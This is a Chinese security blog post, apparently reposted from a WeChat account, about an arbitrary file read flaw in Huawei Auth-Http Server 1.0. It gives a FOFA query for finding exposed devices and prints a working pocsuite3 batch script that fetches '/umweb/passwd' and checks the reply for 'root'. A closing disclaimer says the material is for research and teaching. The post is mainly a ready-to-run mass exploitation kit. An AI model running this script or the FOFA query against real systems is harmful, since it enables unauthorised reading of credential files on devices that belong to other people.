华为Auth-Http Serve任意文件读取漏洞

admin 2024年1月19日10:59:14评论134 views字数 1170阅读3分54秒阅读模式

华为Auth-Http Serve任意文件读取漏洞

华为Auth-Http Serve任意文件读取漏洞

漏洞简介

华为Auth-Http Server 1.0 存在任意文件读取漏洞,攻击者可通过该漏洞读取任意文件。  

华为Auth-Http Serve任意文件读取漏洞

漏洞复现

1.使用下面fofa语句进行资产收集,确认测试目标

fofa语句server="Huawei Auth-Http Server 1.0"

华为Auth-Http Serve任意文件读取漏洞

2.使用burp工具进行抓包,接着构造命令执行请求包,查看响应的内容

华为Auth-Http Serve任意文件读取漏洞

华为Auth-Http Serve任意文件读取漏洞

批量脚本

from pocsuite3.api import Output, POCBase, register_poc, requests, loggerfrom pocsuite3.api import get_listener_ip, get_listener_portfrom pocsuite3.api import REVERSE_PAYLOAD, random_strclass enjoyIT1(POCBase):    pocDesc = ''' 华为Auth-http Server任意文件读取漏洞 '''    vulID = '1'    version = '1.0'    author = '公众号揽月安全团队'    vulDate = '2023-11-27'    createDate = '2023-11-27'    updateDate = '2023-11-27'    name = '华为Auth-http Server任意文件读取漏洞 '    appName = '华为Auth-http Server'    def _verify(self):        result = {}        path = "/umweb/passwd"        headers = {            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36",        }        url = self.url + path        payload = '/umweb/passwd'        try:            response = requests.get(url, headers=headers,verify=False)        # 验证成功输出相关信息            if response.status_code == 200 and 'root' in response.text:                result['VerifyInfo'] = {}                result['VerifyInfo']['URL'] = self.url                result['VerifyInfo']['payload'] = payload            return self.parse_output(result)        except Exception as e:            passregister_poc(enjoyIT1)
使用语法: pocsuite -r Huawei-Auth-http-server -u http://x.x.x.x

        

原文始发于微信公众号(揽月安全团队):华为Auth-Http Serve任意文件读取漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月19日10:59:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   华为Auth-Http Serve任意文件读取漏洞https://cn-sec.com/archives/2409214.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息